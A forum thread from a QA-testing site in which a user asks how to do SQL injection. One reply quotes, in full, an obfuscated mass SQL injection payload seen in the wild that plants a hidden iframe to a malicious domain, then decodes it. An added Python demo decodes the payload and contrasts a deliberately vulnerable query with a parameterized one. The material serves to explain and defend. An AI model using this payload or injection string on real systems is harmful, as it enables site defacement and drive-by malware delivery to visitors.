Quality Testing

How do I perform SQL injection? I have no idea about this, so please help me perform it.

Thanks & Regards,
Nistha


Replies to This Discussion

Hi All...

Thanks a lot for the replies. I'll go through all the provided material and get back to you all again with new questions. :)
Oh... so you were in V2Solutions?
Yup.. and I think I have seen you there... :) :)
Oh... I am not able to recall you... where were you sitting?
Hey, try this out as well.

Last month we saw almost 200 defaced systems with the following SQL injection code. Prevention is explained as well.

It has been observed that a mass SQL injection attack is spreading in the wild, injecting iframes into websites in a manner similar to the Asprox botnet methodology. The attack is designed to inject an iframe into the website source, which forces visitors to download a JavaScript file from malicious remote domains.

The injected SQL strings are obfuscated as HEX strings.

declare%20@s%20varchar(4000);set%20@s=cast(0x64456
34c417245204054207661526368615228323535292c4063207
64152434841722832353529206465634c417265207461624c4
55f635572734f5220435552534f5220466f522053454c45437
420412e6e616d652c622e6e614d652066726f4d207379734f6
26a6543747320612c737973434f4c754d4e732062207768655
24520612e69643d422e696420614e4420412e58745950653d2
7552720616e642028622e78545950653d3939206f7220622e5
8547970653d3335206f5220422e78545950653d323331204f5
220622e78747970453d31363729206f50454e205441624c655
f637552736f72206645544348206e6558542046524f6d20546
1426c455f437552734f7220494e744f2040542c40632077686
96c4528404046657443685f7374417475533d3029206265474
96e20657845632827557044615445205b272b40742b275d205
36554205b272b40632b275d3d727452494d28434f4e5665525
428564152434841722834303030292c5b272b40432b275d292
92b63615354283078334336393636373236313644363532303
73337323633334432323638373437343730334132463246364
53635364436463638373536393643363436393639364532453
73237353246373436343733324636373646324537303638373
03346373336393634334433313232323037373639363437343
63833443232333032323230363836353639363736383734334
43232333032323230373337343739364336353344323236343
63937333730364336313739334136453646364536353232334
53343324636393636373236313644363533452061532076615
2434861722831303629292729204645544368204e657874206
6526f6d207441426c655f635572734f7220496e744f2040742
c406320456e4420436c6f7365207461626c455f437552736f5
2206445414c4c6f43415465205461424c655f435552736f722
0%20as%20varchar(4000));exec(@s);--

The decoded strings can be normalized in a more readable form:

dEClarE @T Varchar(4000);
DEClare @c VarChar(255)
DeCLaRe tablE_CursOR cUrSOr foR
SELEcT [A].NAmE,[b].naME
fROM sYsoBJEcTs [A],sysColUMns [B]
WHeRE A.Id=b.Id ANd
a.xtyPe='U' /*table( User defined)*/ aNd
(b.xtYpe=99 oR B.xtype=35 OR
b.xTypE=231 OR
B.XtypE=167) /* ntext, text, nvarchar and varchar columns */
OPEn tABLe_CursoR feTCh NEXT fROm tAble_cUrsor INTO @t,@C
whIle(@@fETCh_StaTUs=0)
BEGIn
eXEc('UpdAte ['+@T+'] sET ['+@C+']=rTrim(conVERt(vaRCHar(4000),['+@c+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))')
/* the inner 0x... literal above decodes to: <iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe> */
feTCh NEXT fROm tAble_cUrsor INTO @t,@C
END
CLOSE tablE_CursOR
DEALLOCATE tablE_CursOR
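An added Python example (mine, not code from the post or its author) that does two things with the payload shape quoted above: it peels the three encoding layers (URL encoding, the outer CAST(0x...) that wraps the whole batch, and the inner CAST(0x...) that carries the HTML) and then replays what the batch does, appending the iframe to every text column of every row, against a throwaway SQLite table next to the parameterized query that stops it. The hostname attacker.invalid, the request path, the products table and its rows are constructed for the example; the T-SQL batch is only data to be decoded here, since SQLite has no sysobjects or cursor batches.

```python
# Added example: decode the layered hex obfuscation of the payload above and
# replay its effect against a throwaway SQLite table. Not from the original post.
import re
import sqlite3
from urllib.parse import unquote

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")


def decode_hex_literals(text):
    """Decode every 0x... literal found in `text` to a string."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(text)]


def unwrap_payload(request):
    """Return (url-decoded request, decoded outer CAST batches, hex literals nested in them).

    Layer 1: URL encoding (%20).  Layer 2: CAST(0x... AS varchar) around the whole
    T-SQL batch.  Layer 3: a second CAST(0x...) inside that batch carrying the HTML
    that gets appended to every text column.
    """
    decoded = unquote(request)
    outer = decode_hex_literals(decoded)
    inner = [s for batch in outer for s in decode_hex_literals(batch)]
    return decoded, outer, inner


# --- Constructed sample request, same shape as the post's payload (made-up host) ---
IFRAME = ('<iframe src="http://attacker.invalid/go.php?sid=1" '
          'width="0" height="0" style="display:none"></iframe>')
INNER_HEX = IFRAME.encode("ascii").hex().upper()
TSQL_BATCH = (
    "dEClarE @T Varchar(4000);DEClare @c VarChar(255);"
    "DeCLaRe tablE_CursOR cUrSOr foR SELEcT a.name,b.name fROM sysobjects a,syscolumns b "
    "WHeRE a.id=b.id ANd a.xtype='U' aNd (b.xtype=99 oR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEn tABLe_CursoR feTCh NEXT fROm tAble_cUrsor INTO @t,@c whIle(@@fETCh_StaTUs=0) BEGIn "
    "eXEc('UpdAte ['+@T+'] sET ['+@C+']=rTrim(conVERt(vaRCHar(4000),['+@c+']))+caSt(0x"
    + INNER_HEX + " aS vaRCHar(" + str(len(IFRAME)) + "))') "
    "feTCh NEXT fROm tAble_cUrsor INTO @t,@c END CLOSE tablE_CursOR DEALLOCATE tablE_CursOR"
)
SAMPLE_REQUEST = (
    "/product.asp?id=1;declare%20@s%20varchar(4000);set%20@s=cast(0x"
    + TSQL_BATCH.encode("ascii").hex()
    + "%20as%20varchar(4000));exec(@s);--"
)


# --- What the batch does, replayed against SQLite (constructed victim table) ---
def build_db():
    """Throwaway in-memory database standing in for the victim's user tables."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, blurb TEXT);"
        "INSERT INTO products(name, blurb) VALUES ('Widget','Small widget'),"
        "('Gadget','Handy gadget');"
    )
    return db


def all_rows(db):
    return db.execute("SELECT name, blurb FROM products ORDER BY id").fetchall()


# Same effect as the cursor loop in the post (append the iframe to every text
# column of every row), spelled in SQLite's dialect. The real payload also ends
# with "--" to comment out whatever followed the injection point.
ATTACK_INPUT = ("1; UPDATE products SET name = name || '" + IFRAME + "', "
                "blurb = blurb || '" + IFRAME + "';")


def lookup_vulnerable(db, product_id):
    """String concatenation plus batch execution: the hole the payload needs."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    # executescript runs every statement in the string, like a T-SQL batch;
    # sqlite3's execute() would refuse a second statement, which is one reason
    # this class of attack hit SQL Server backends.
    db.executescript(sql)
    return all_rows(db)


def lookup_safe(db, product_id):
    """Parameterized query: the input is bound as a value, never parsed as SQL."""
    rows = db.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchall()
    return [r[0] for r in rows], all_rows(db)


if __name__ == "__main__":
    decoded, outer, inner = unwrap_payload(SAMPLE_REQUEST)
    print("outer batch:", outer[0][:60], "...")
    print("nested HTML:", inner[0])
    print("vulnerable lookup leaves:", lookup_vulnerable(build_db(), ATTACK_INPUT))
    print("safe lookup returns/leaves:", lookup_safe(build_db(), ATTACK_INPUT))
```

Run it as a script to see both the decoded layers and the defaced rows; the parameterized lookup matches nothing (the injected text is not a well-formed number, so it never compares equal to an integer id) and leaves the table untouched.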
© 2021   Created by Quality Testing.